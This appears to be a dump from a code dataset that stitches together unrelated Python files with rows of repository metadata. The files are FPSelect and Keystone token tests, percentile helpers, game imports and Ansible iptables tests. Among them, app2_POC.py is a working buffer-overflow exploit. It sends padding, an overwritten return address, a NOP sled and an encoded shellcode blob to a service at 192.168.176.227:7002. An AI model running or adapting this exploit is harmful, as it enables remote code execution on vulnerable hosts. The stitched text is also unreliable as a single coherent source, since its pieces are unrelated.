self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
# ======= FPSelect with a single process and using the DummyCleanDataset ======
# ========== FPSelect using multiprocessing and the DummyCleanDataset =========
class TestFPSelectSinglePathPruningOnMultiprocessing(TestFPSelectSinglePathPruningOn):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON
self._explored_paths = 1
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectSinglePathPruningOffMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF
self._explored_paths = 1
self._pruning = PRUNING_OFF
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectMultipathPruningOnMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON
self._explored_paths = MULTI_EXPLR_PATHS
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectMultipathPruningOffMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF
self._pruning = PRUNING_OFF
self._explored_paths = MULTI_EXPLR_PATHS
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
# ========== FPSelect using multiprocessing and the DummyCleanDataset =========
if __name__ == '__main__':
unittest.main()
| 45.375776
| 102
| 0.723701
| 1,457
| 14,611
| 6.865477
| 0.107756
| 0.050685
| 0.037389
| 0.047986
| 0.826352
| 0.820054
| 0.792362
| 0.761572
| 0.73318
| 0.702389
| 0
| 0.002493
| 0.203819
| 14,611
| 321
| 103
| 45.517134
| 0.857388
| 0.09137
| 0
| 0.743902
| 0
| 0
| 0.046587
| 0.015101
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.069106
| false
| 0.004065
| 0.073171
| 0
| 0.174797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba090bda0cafdff1a6f517b96924b5b2f3caffda
| 12,476
|
py
|
Python
|
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
import unittest2 as unittest
from keystone.test.functional import common
class TestHPIDMTokensExtension(common.FunctionalTestCase):
"""Test HP-IDM token validation extension"""
def setUp(self):
super(TestHPIDMTokensExtension, self).setUp()
password = common.unique_str()
self.user = self.create_user(user_password=password).json['user']
self.user['password'] = password
self.tenant = self.create_tenant().json['tenant']
self.service = self.create_service().json['OS-KSADM:service']
r = self.create_role(service_name=self.service['name'])
self.role = r.json['role']
self.another_service = self.create_service().json['OS-KSADM:service']
self.service_with_no_users = self.create_service().\
json['OS-KSADM:service']
ar = self.create_role(service_name=self.another_service['name'])
self.another_role = ar.json['role']
rnu = self.create_role(service_name=self.service_with_no_users['name'])
self.role_with_no_users = rnu.json['role']
rns = self.create_role()
self.role_with_no_service = rns.json['role']
self.grant_role_to_user(self.user['id'],
self.role['id'], self.tenant['id'])
self.grant_role_to_user(self.user['id'],
self.role_with_no_service['id'],
self.tenant['id'])
self.grant_role_to_user(self.user['id'],
self.another_role['id'], self.tenant['id'])
self.global_role = self.create_role().json['role']
# crete a global role
self.put_user_role(self.user['id'], self.global_role['id'], None)
def get_token_belongsto(self, token_id, tenant_id, service_ids, **kwargs):
"""GET /tokens/{token_id}?belongsTo={tenant_id}
[&HP-IDM-serviceId={service_ids}]"""
serviceId_qs = ""
if service_ids:
serviceId_qs = "&HP-IDM-serviceId=%s" % (service_ids)
return self.admin_request(method='GET',
path='/tokens/%s?belongsTo=%s%s' % (token_id, tenant_id,
serviceId_qs), **kwargs)
def check_token_belongs_to(self, token_id, tenant_id, service_ids,
**kwargs):
"""HEAD /tokens/{token_id}?belongsTo={tenant_id}
[&HP-IDM-serviceId={service_ids}]"""
serviceId_qs = ""
if service_ids:
serviceId_qs = "&HP-IDM-serviceId=%s" % (service_ids)
return self.admin_request(method='HEAD',
path='/tokens/%s?belongsTo=%s%s' % (token_id, tenant_id,
serviceId_qs), **kwargs)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_with_serviceId(self):
    """A scoped token validated with one service id returns only that
    service's role."""
    auth_body = {
        'auth': {
            'passwordCredentials': {
                'username': self.user['name'],
                'password': self.user['password']},
            'tenantName': self.tenant['name']}}
    scoped = self.post_token(as_json=auth_body).json['access']
    token = scoped['token']
    self.assertEqual(token['tenant']['id'], self.tenant['id'])
    self.assertEqual(token['tenant']['name'], self.tenant['name'])
    # An admin validates the token, filtering roles to one service.
    resp = self.get_token_belongsto(token_id=token['id'],
                                    tenant_id=self.tenant['id'],
                                    service_ids=self.service['id'])
    access = resp.json['access']
    self.assertEqual(access['user']['id'], self.user['id'])
    self.assertEqual(access['user']['name'], self.user['name'])
    self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(access['token']['tenant']['name'],
                     self.tenant['name'])
    # Exactly one role — the one bound to the requested service.
    self.assertIsNotNone(access['user'].get('roles'))
    self.assertEqual(len(access['user']['roles']), 1)
    self.assertEqual(access['user']['roles'][0]['name'],
                     self.role['name'])
    # HEAD-style validation must also succeed.
    self.check_token_belongs_to(token_id=token['id'],
                                tenant_id=self.tenant['id'],
                                service_ids=self.service['id'],
                                assert_status=200)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_with_all_serviceId(self):
    """Validating with both of the user's service ids returns both
    service-bound roles.

    Fix: the original built ``role_names`` with ``map()``, which on
    Python 3 is a one-shot iterator — the second ``in`` membership
    check could run against an already-exhausted iterator. A list
    comprehension is safe on both Python 2 and 3.
    """
    scoped = self.post_token(as_json={
        'auth': {
            'passwordCredentials': {
                'username': self.user['name'],
                'password': self.user['password']},
            'tenantName': self.tenant['name']}}).json['access']
    self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(scoped['token']['tenant']['name'],
                     self.tenant['name'])
    # And an admin should be able to validate that our new token is scoped
    service_ids = "%s,%s" % \
        (self.service['id'], self.another_service['id'])
    r = self.get_token_belongsto(token_id=scoped['token']['id'],
                                 tenant_id=self.tenant['id'],
                                 service_ids=service_ids)
    access = r.json['access']
    self.assertEqual(access['user']['id'], self.user['id'])
    self.assertEqual(access['user']['name'], self.user['name'])
    self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(access['token']['tenant']['name'],
                     self.tenant['name'])
    # make sure only the service roles are returned
    self.assertIsNotNone(access['user'].get('roles'))
    self.assertEqual(len(access['user']['roles']), 2)
    # List (not map()) so repeated membership checks are safe on py3.
    role_names = [role['name'] for role in access['user']['roles']]
    self.assertIn(self.role['name'], role_names)
    self.assertIn(self.another_role['name'], role_names)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_with_no_user_service(self):
    """A requested service with no user roles is simply excluded from
    the returned role list.

    Fix: replaced ``map()`` with a list comprehension — ``map()`` is a
    one-shot iterator on Python 3, so the second membership check could
    run against an exhausted iterator.
    """
    scoped = self.post_token(as_json={
        'auth': {
            'passwordCredentials': {
                'username': self.user['name'],
                'password': self.user['password']},
            'tenantName': self.tenant['name']}}).json['access']
    self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(scoped['token']['tenant']['name'],
                     self.tenant['name'])
    # And an admin should be able to validate that our new token is scoped
    service_ids = "%s,%s,%s" % (self.service['id'],
                                self.another_service['id'],
                                self.service_with_no_users['id'])
    r = self.get_token_belongsto(token_id=scoped['token']['id'],
                                 tenant_id=self.tenant['id'],
                                 service_ids=service_ids)
    access = r.json['access']
    self.assertEqual(access['user']['id'], self.user['id'])
    self.assertEqual(access['user']['name'], self.user['name'])
    self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(access['token']['tenant']['name'],
                     self.tenant['name'])
    # make sure only the service roles are returned, excluding the one
    # with no users
    self.assertIsNotNone(access['user'].get('roles'))
    self.assertEqual(len(access['user']['roles']), 2)
    # List (not map()) so repeated membership checks are safe on py3.
    role_names = [role['name'] for role in access['user']['roles']]
    self.assertIn(self.role['name'], role_names)
    self.assertIn(self.another_role['name'], role_names)
    # make sure check token also works
    self.check_token_belongs_to(token_id=scoped['token']['id'],
                                tenant_id=self.tenant['id'],
                                service_ids=service_ids,
                                assert_status=200)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_without_serviceId(self):
    """Validation with no service filter returns every role the user
    holds (service-bound, service-less, and global).

    Fix: replaced ``map()`` with a list comprehension — ``map()`` is a
    one-shot iterator on Python 3, so the four membership checks below
    would exhaust it after the first pass.
    """
    scoped = self.post_token(as_json={
        'auth': {
            'passwordCredentials': {
                'username': self.user['name'],
                'password': self.user['password']},
            'tenantName': self.tenant['name']}}).json['access']
    self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(scoped['token']['tenant']['name'],
                     self.tenant['name'])
    # And an admin should be able to validate that our new token is scoped
    r = self.get_token_belongsto(token_id=scoped['token']['id'],
                                 tenant_id=self.tenant['id'],
                                 service_ids=None)
    access = r.json['access']
    self.assertEqual(access['user']['id'], self.user['id'])
    self.assertEqual(access['user']['name'], self.user['name'])
    self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(access['token']['tenant']['name'],
                     self.tenant['name'])
    # make sure all the roles are returned
    self.assertIsNotNone(access['user'].get('roles'))
    self.assertEqual(len(access['user']['roles']), 4)
    # List (not map()) so repeated membership checks are safe on py3.
    role_names = [role['name'] for role in access['user']['roles']]
    self.assertIn(self.role['name'], role_names)
    self.assertIn(self.another_role['name'], role_names)
    self.assertIn(self.global_role['name'], role_names)
    self.assertIn(self.role_with_no_service['name'], role_names)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_with_global_service_id(self):
    """The literal 'global' service id pulls in the user's global role
    alongside the service-bound ones.

    Fix: replaced ``map()`` with a list comprehension — ``map()`` is a
    one-shot iterator on Python 3, so repeated membership checks could
    run against an exhausted iterator.
    """
    scoped = self.post_token(as_json={
        'auth': {
            'passwordCredentials': {
                'username': self.user['name'],
                'password': self.user['password']},
            'tenantName': self.tenant['name']}}).json['access']
    self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(scoped['token']['tenant']['name'],
                     self.tenant['name'])
    service_ids = "%s,%s,global" % (self.service['id'],
                                    self.another_service['id'])
    r = self.get_token_belongsto(token_id=scoped['token']['id'],
                                 tenant_id=self.tenant['id'],
                                 service_ids=service_ids)
    access = r.json['access']
    self.assertEqual(access['user']['id'], self.user['id'])
    self.assertEqual(access['user']['name'], self.user['name'])
    self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
    self.assertEqual(access['token']['tenant']['name'],
                     self.tenant['name'])
    # make sure only the service roles are returned
    self.assertIsNotNone(access['user'].get('roles'))
    self.assertEqual(len(access['user']['roles']), 3)
    # List (not map()) so repeated membership checks are safe on py3.
    role_names = [role['name'] for role in access['user']['roles']]
    self.assertIn(self.role['name'], role_names)
    self.assertIn(self.another_role['name'], role_names)
    self.assertIn(self.global_role['name'], role_names)
@unittest.skipIf(common.isSsl(),
                 "Skipping SSL tests")
def test_token_validation_with_bogus_service_id(self):
    """Validation must be rejected (401) when an unknown service id is
    included in the filter."""
    credentials = {
        'passwordCredentials': {
            'username': self.user['name'],
            'password': self.user['password']},
        'tenantName': self.tenant['name']}
    scoped = self.post_token(as_json={'auth': credentials}).json['access']
    token = scoped['token']
    self.assertEqual(token['tenant']['id'], self.tenant['id'])
    self.assertEqual(token['tenant']['name'], self.tenant['name'])
    bogus_ids = "%s,%s,boguzzz" % (self.service['id'],
                                   self.another_service['id'])
    # Both GET and HEAD validation must fail outright.
    self.get_token_belongsto(token_id=token['id'],
                             tenant_id=self.tenant['id'],
                             service_ids=bogus_ids,
                             assert_status=401)
    self.check_token_belongs_to(token_id=token['id'],
                                tenant_id=self.tenant['id'],
                                service_ids=bogus_ids,
                                assert_status=401)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 48.169884
| 79
| 0.570535
| 1,421
| 12,476
| 4.851513
| 0.085855
| 0.051349
| 0.059182
| 0.046707
| 0.885408
| 0.870612
| 0.863214
| 0.847694
| 0.817377
| 0.812446
| 0
| 0.002074
| 0.26579
| 12,476
| 258
| 80
| 48.356589
| 0.750546
| 0.06789
| 0
| 0.724638
| 0
| 0
| 0.139363
| 0.004336
| 0
| 0
| 0
| 0
| 0.280193
| 1
| 0.043478
| false
| 0.072464
| 0.009662
| 0
| 0.067633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ba10ffecdd9bb39f4629b9406cabb09fd5f9e246
| 285
|
py
|
Python
|
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | 5
|
2021-04-26T12:55:05.000Z
|
2021-12-23T20:03:57.000Z
|
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | null | null | null |
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | 3
|
2021-02-12T23:12:22.000Z
|
2021-06-11T14:25:58.000Z
|
import numpy as np
def p05(x: np.ndarray) -> float:
    """Return the 5th percentile of the values in *x*."""
    return np.percentile(x, q=5)
def p95(x: np.ndarray) -> float:
    """Return the 95th percentile of the values in *x*."""
    return np.percentile(x, q=95)
def p01(x: np.ndarray) -> float:
    """Return the 1st percentile of the values in *x*."""
    return np.percentile(x, q=1)
def p99(x: np.ndarray) -> float:
    """Return the 99th percentile of the values in *x*."""
    return np.percentile(x, q=99)
| 15.833333
| 32
| 0.635088
| 48
| 285
| 3.770833
| 0.375
| 0.066298
| 0.220994
| 0.331492
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0
| 0
| 0
| 0.062222
| 0.210526
| 285
| 17
| 33
| 16.764706
| 0.742222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0.444444
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
ba129e76aa6dd4408b4db4e9d0527e56c8b867b0
| 1,958
|
py
|
Python
|
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Buffer-overflow proof of concept (Python 2 syntax). Sends an oversized
# buffer to a vulnerable service to overwrite the saved return address
# and execute the embedded shellcode.
import socket
try:
    print "\nSending evil buffer..."
    # Encoded shellcode blob — presumably msfvenom output (the leading
    # bytes match a common GetPC/decoder stub); exact payload action is
    # not determinable from here — TODO confirm before reuse.
    payload = ("\xbe\x12\xe4\x2f\xbb\xd9\xec\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
    "\x52\x31\x73\x12\x03\x73\x12\x83\xf9\x18\xcd\x4e\x01\x08\x90"
    "\xb1\xf9\xc9\xf5\x38\x1c\xf8\x35\x5e\x55\xab\x85\x14\x3b\x40"
    "\x6d\x78\xaf\xd3\x03\x55\xc0\x54\xa9\x83\xef\x65\x82\xf0\x6e"
    "\xe6\xd9\x24\x50\xd7\x11\x39\x91\x10\x4f\xb0\xc3\xc9\x1b\x67"
    "\xf3\x7e\x51\xb4\x78\xcc\x77\xbc\x9d\x85\x76\xed\x30\x9d\x20"
    "\x2d\xb3\x72\x59\x64\xab\x97\x64\x3e\x40\x63\x12\xc1\x80\xbd"
    "\xdb\x6e\xed\x71\x2e\x6e\x2a\xb5\xd1\x05\x42\xc5\x6c\x1e\x91"
    "\xb7\xaa\xab\x01\x1f\x38\x0b\xed\xa1\xed\xca\x66\xad\x5a\x98"
    "\x20\xb2\x5d\x4d\x5b\xce\xd6\x70\x8b\x46\xac\x56\x0f\x02\x76"
    "\xf6\x16\xee\xd9\x07\x48\x51\x85\xad\x03\x7c\xd2\xdf\x4e\xe9"
    "\x17\xd2\x70\xe9\x3f\x65\x03\xdb\xe0\xdd\x8b\x57\x68\xf8\x4c"
    "\x97\x43\xbc\xc2\x66\x6c\xbd\xcb\xac\x38\xed\x63\x04\x41\x66"
    "\x73\xa9\x94\x29\x23\x05\x47\x8a\x93\xe5\x37\x62\xf9\xe9\x68"
    "\x92\x02\x20\x01\x39\xf9\xa3\xee\x16\x76\xf2\x87\x64\x78\xfb"
    "\xec\xe0\x9e\x91\x02\xa5\x09\x0e\xba\xec\xc1\xaf\x43\x3b\xac"
    "\xf0\xc8\xc8\x51\xbe\x38\xa4\x41\x57\xc9\xf3\x3b\xfe\xd6\x29"
    "\x53\x9c\x45\xb6\xa3\xeb\x75\x61\xf4\xbc\x48\x78\x90\x50\xf2"
    "\xd2\x86\xa8\x62\x1c\x02\x77\x57\xa3\x8b\xfa\xe3\x87\x9b\xc2"
    "\xec\x83\xcf\x9a\xba\x5d\xb9\x5c\x15\x2c\x13\x37\xca\xe6\xf3"
    "\xce\x20\x39\x85\xce\x6c\xcf\x69\x7e\xd9\x96\x96\x4f\x8d\x1e"
    "\xef\xad\x2d\xe0\x3a\x76\x5d\xab\x66\xdf\xf6\x72\xf3\x5d\x9b"
    "\x84\x2e\xa1\xa2\x06\xda\x5a\x51\x16\xaf\x5f\x1d\x90\x5c\x12"
    "\x0e\x75\x62\x81\x2f\x5c")
    # 0x830 (2096) bytes of padding up to the saved return address.
    filler = "A" * 0x830 # 830
    # Value written over saved EIP — presumably a JMP/CALL gadget
    # address in the target binary (little-endian 0x10090c83) — TODO
    # confirm against the target module.
    eip = "\x83\x0c\x09\x10"
    offset = "C" * 4
    # Short NOP sled before the decoder stub.
    sled = "\x90" * 16
    # Unused trailing marker bytes; the real payload is 'payload' above.
    shellcode = "D" * 1000
    inputBuffer = filler + eip + offset + sled + payload
    buffer = inputBuffer
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.176.227", 7002))
    s.send(buffer)
    s.close()
    print "\nDone!"
# NOTE(review): bare except hides every error, not just connection
# failures — acceptable for a throwaway PoC, not for real code.
except:
    print "\nCould not connect!"
| 37.653846
| 75
| 0.687436
| 416
| 1,958
| 3.230769
| 0.560096
| 0.008929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265351
| 0.068437
| 1,958
| 51
| 76
| 38.392157
| 0.471491
| 0.010215
| 0
| 0
| 0
| 0.560976
| 0.771178
| 0.725207
| 0
| 1
| 0.002583
| 0
| 0
| 0
| null | null | 0
| 0.02439
| null | null | 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8826301136a2a710f4f2da3588f387b56879102
| 72
|
py
|
Python
|
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
from dlhp.hexapawn.hpboard import *
from dlhp.hexapawn.hptypes import *
| 24
| 35
| 0.805556
| 10
| 72
| 5.8
| 0.6
| 0.275862
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 72
| 2
| 36
| 36
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e8cf59a07fa758682108410e09aa7d3abcf2d68f
| 165
|
py
|
Python
|
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on 2020/12/21 15:42
@author: pipazi
"""
# from ...L3.L3_1 import L3_1_1
from ..L3_1 import L3_1_1
def L4_1_1():
    """Delegate to ``L3_1_1`` from the grandparent package — a demo of
    Python relative imports across package levels."""
    L3_1_1()
| 11.785714
| 31
| 0.606061
| 34
| 165
| 2.647059
| 0.529412
| 0.166667
| 0.133333
| 0.244444
| 0.288889
| 0.288889
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 0.2
| 165
| 13
| 32
| 12.692308
| 0.454545
| 0.587879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e8d8ff2c6169603238695af7109f49b6d7d5742c
| 31,617
|
py
|
Python
|
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.module_utils import basic
from ansible.modules import iptables
from units.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_bin_path(*args, **kwargs):
    """Test stub for ``AnsibleModule.get_bin_path``: ignore all
    arguments and always resolve to /sbin/iptables."""
    return "/sbin/iptables"
def get_iptables_version(iptables_path, module):
    """Test stub for ``iptables.get_iptables_version``: report a fixed
    version without shelling out."""
    return "1.8.2"
class TestIptables(ModuleTestCase):
def setUp(self):
super(TestIptables, self).setUp()
self.mock_get_bin_path = patch.object(basic.AnsibleModule, 'get_bin_path', get_bin_path)
self.mock_get_bin_path.start()
self.addCleanup(self.mock_get_bin_path.stop) # ensure that the patching is 'undone'
self.mock_get_iptables_version = patch.object(iptables, 'get_iptables_version', get_iptables_version)
self.mock_get_iptables_version.start()
self.addCleanup(self.mock_get_iptables_version.stop) # ensure that the patching is 'undone'
def test_without_required_parameters(self):
"""Failure must occurs when all parameters are missing"""
with self.assertRaises(AnsibleFailJson):
set_module_args({})
iptables.main()
def test_flush_table_without_chain(self):
"""Test flush without chain, flush the table"""
set_module_args({
'flush': True,
})
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.return_value = 0, '', '' # successful execution, no output
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args[0][0][0], '/sbin/iptables')
self.assertEqual(run_command.call_args[0][0][1], '-t')
self.assertEqual(run_command.call_args[0][0][2], 'filter')
self.assertEqual(run_command.call_args[0][0][3], '-F')
def test_flush_table_check_true(self):
"""Test flush without parameters and check == true"""
set_module_args({
'flush': True,
'_ansible_check_mode': True,
})
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.return_value = 0, '', '' # successful execution, no output
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 0)
# TODO ADD test flush table nat
# TODO ADD test flush with chain
# TODO ADD test flush with chain and table nat
def test_policy_table(self):
"""Test change policy of a chain"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
})
commands_results = [
(0, 'Chain INPUT (policy DROP)\n', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-P',
'INPUT',
'ACCEPT',
])
def test_policy_table_no_change(self):
"""Test don't change policy of a chain if the policy is right"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
})
commands_results = [
(0, 'Chain INPUT (policy ACCEPT)\n', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
